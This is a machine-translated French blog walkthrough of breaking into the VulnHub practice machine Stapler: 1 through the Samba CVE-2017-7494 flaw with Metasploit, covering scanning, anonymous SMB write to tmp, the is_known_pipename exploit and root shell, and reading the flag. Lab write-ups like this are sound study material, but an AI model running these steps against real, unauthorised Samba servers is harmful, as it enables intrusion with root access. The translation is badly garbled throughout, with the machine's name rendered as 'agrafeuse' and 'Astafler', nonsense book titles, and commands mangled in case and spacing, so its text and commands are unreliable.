[CVE-2017-7494] En utilisant le cadre Metasploit, j'ai essayé d'infiltrer l'agrafeuse: 1 en raison d'une vulnérabilité en samba.

[CVE-2017-7494] En utilisant le cadre Metasploit, j'ai essayé d'infiltrer l'agrafeuse: 1 en raison d'une vulnérabilité en samba.

Nous vous montrerons comment infiltrer "Astafler: 1" publié par Staper sur VulnHub à l'aide du framework Metasploit.
Si vous avez toujours un environnement avec Stapler: 1, veuillez vous référer à Construire un environnement avec ANDEPLER: 1 sur VirtualBox sur Windows!

Livres de référence recommandés
Le jour de la première journée de la première fois est en cours! / /
Amazone
Auteur: ipusiron
¥3,850 (À partir de 21:11 le 07/08/2025 | Recherche Amazon)
Le jour de la première journée de la première fois est en cours! / /
Amazone
Auteur: Justin Seitz, auteur: Tim Arnold, supervisé par: Mantani Nobutaka, Traduction: Arai Yu, Traduction: Kakara Hirosei, Traduction: Murakami Ryo
¥3,520 (À partir de 12:26 le 07/09/2025 | Recherche Amazon)
Le jour de la première journée de la première fois est en cours! / /
Amazone
table des matières

Qu'est-ce que le cadre Metasploit?

Le cadre Metasploit (ci-après dénommé Metasploit) est un logiciel développé principalement par Rapid7 pour effectuer des tests de pénétration.
Kali Linux est le cadre de test de pénétration le plus populaire au monde, car il est inclus en standard.

Invade Astapler: 1 de la vulnérabilité de Samba

Cette fois, nous infiltrons l'agrafeuse: 1 en utilisant Metasploit, qui attaque la vulnérabilité de CVE -2017-7494

Vérifiez si l'agrafeuse est sur le même réseau.

Vérifiez si l'agrafeuse est sur le même réseau.
La commande à vérifier est "netDiscover".

NetDiscover -R 192.168.2.0

C'est OK tant que vous pouvez tourner actuellement; Fini! et confirmer que Samba est sur le même réseau.

SCAN SERVICES À SPARTA

Un outil appelé Sparta est utilisé pour scanner des services exécutés sur le port cible et collecter des informations.

Démarrez Sparta avec la commande ci-dessous.

Sparte

Si ce qui précède est "commande non trouvée",

APT INSTALER LEGION LEGION

Exécutez ce qui précède pour lancer la région.
La région contient des Sparta-Scripts.

Vous verrez un écran similaire à celui ci-dessous.
Cliquez sur "Cliquez ici pour ajouter des hôtes à la portée."

Entrez votre adresse IP et cliquez sur Soumettre.

Cliquez sur Soumettre pour démarrer l'analyse, alors attendez que NMAP (Stage5) soit terminé.
Une fois terminé, vous serez dans l'état suivant:

Identifier la version

Dans Sparta, vous ne pouvez pas spécifier la version de Samba, nous utiliserons donc NMAP pour identifier la version.

nmap -vvv -a -p 139 192.168.2.5

Vous pouvez voir que la version est "4.3.9-ubuntu".

Vérifiez le module d'attaque dans Metasproit

Vérifiez Metasproit pour les modules d'attaque pour la version de Samba que vous avez identifiée.

Lorsque j'ai cherché, j'ai trouvé un module d'attaque qui correspond à "CVE -2017-7494".

Ici, vous pouvez trouver trois conditions pour une attaque réussie:

  1. Des références valides
  2. Dossier inscriptible dans une part accessible
  3. Chemin côté serveur du dossier Writable

Ensuite, vérifions si les conditions sont remplies.

Vérifiez les "informations d'identification valides"

Les informations d'identification valides répondent aux exigences si vous n'avez pas besoin d'un mot de passe pour y accéder.

SMBClient -L 192.168.2.5 Entrez le mot de passe de WorkGroup \ HackLab:

Allez à Samba avec.
Pour le moment, il vous sera demandé votre mot de passe, mais veuillez ne pas y entrer et appuyer sur Entrée.

Cela montre que la condition "des informations d'identification valide" est remplie.

Vérifiez "Dossier inscriptible dans une part accessible"

Ensuite, consultez le dossier Writable dans une part accessible.
Le dossier inscriptible dans un partage accessible répond aux exigences s'il existe un dossier partagé accessible et inscrit.

Créez un fichier texte dans un emplacement approprié. Le contenu est bien et il n'y a pas de problème.

Étant donné que TMP n'a souvent aucune restriction d'écriture, je vais essayer de placer le fichier dans TMP.

SMBClient //192.168.2.5/tmp entrez le mot de passe de WorkGroup \ HackLab:
mettre du texte.txt

Cela garantit que l'écriture est réussie et que le "dossier inscriptible dans une condition accessible" a également été rempli.

Vérifiez "Chemin côté serveur du dossier inscriptible"

Enfin, vérifiez "Chemin côté serveur du dossier Writable".
Le chemin du côté serveur du dossier inscriptible remplit les conditions s'il est possible de vérifier le chemin du côté serveur du dossier inscriptible.

NMAP -SU -SS --Script Smb-enum-shares.nse -p U: 137, T: 139 192.168.2.5

En faisant ce qui précède,

Vous pouvez voir que le chemin est "c: \ var \ tmp". Étant donné que l'autre partie est Linux, en réalité, lisez-le comme "/ var / tmp".
J'ai également trouvé le chemin, donc je rencontre également la condition "Chemin côté serveur du dossier Writable".

Configurer l'exploit

Étant donné que les trois conditions sont remplies, utilisons réellement Metasploit pour attaquer.
La procédure d'attaque est comme décrit.

  1. Démarrer msfconsole
  2. Faire: Utiliser Exploit / Linux / Samba / Is_Known_PipeName
  3. Faire: définir Rhost [IP]
  4. Faire: définir la cible [Target #]
  5. Faire: exploiter

Tout d'abord, démarrez msfconsole.

msfconsole

Une fois qu'il est en place, exécutez "Utilisez Expoit / Linux / Samba / Is_Known_PipeName".

Utiliser Exploit / Linux / Samba / Is_Known_PipeName

Maintenant, exécutons des options de spectacle et voyons.

Afficher les options

Vous pouvez attaquer en spécifiant l'article avec le réglage requis sur oui et à la charge utile.

Tout d'abord, configurez des Rhosts et RPORT.
Ici, spécifiez des informations sur la Samba cible.

Set Rhost 192.168.2.5 Set Rport 139

Ensuite, vérifiez les charges utiles disponibles.

Afficher les charges utiles

Définissez la charge utile sur CMD / UNIX / Interact.

Définir la charge utile CMD / UNIX / Interact

Cela complète la configuration d'exploit.
Pour être sûr, je vais vérifier les options de spectacle.

En fait, il envahira

Alors, allons-y.

Exécutez simplement "Run" tout en laissant Exproit Set.

courir

Si la session de coquille de commande 1 ouverte s'affiche, vous avez accès avec les privilèges racine.

Si une erreur de cryptage se produit dans MSF6, veuillez vous référer à la référence suivante.

set smb :: AlwaysCrypt False Set Smb :: ProtoColversion 1

Vérifions les informations.

identifiant
PWD
LS -LA

Démarrer Pty

C'est bien de continuer comme ça, mais cela interférera avec le mouvement latéral, comme le fait de ne pas pouvoir SSH, alors assurez-vous de démarrer Pty.

Exécutez simplement la commande suivante:

python -c 'import pty; pty.spawn ("/ bin / sh") '

Vérifiez le drapeau

Maintenant, vérifions le drapeau et terminons-le.

CD / Root LS -LA

Vérifiez le contenu de Flag.txt.

Cat Flag.txt

C'est ça!

dernièrement

Cette fois, nous avons essayé d'infiltrer l'agrafeuse: 1 en utilisant le cadre Metasploit en raison de la vulnérabilité du CVE-2017-7494.

Astauré: 1 a d'autres moyens d'envahir.
Nous introduisons également d'autres méthodes, veuillez donc nous y référer.

Partagez si vous le souhaitez!

Qui a écrit cet article

Ceci est un blog que j'ai commencé à étudier la sécurité de l'information. En tant que nouvel employé, je serais heureux si vous pouviez regarder avec un cœur large.
Il y a aussi Teech Lab, qui est l'occasion d'étudier le plaisir en programmation, donc si vous êtes intéressé par le développement de logiciels, assurez-vous de jeter un œil!

table des matières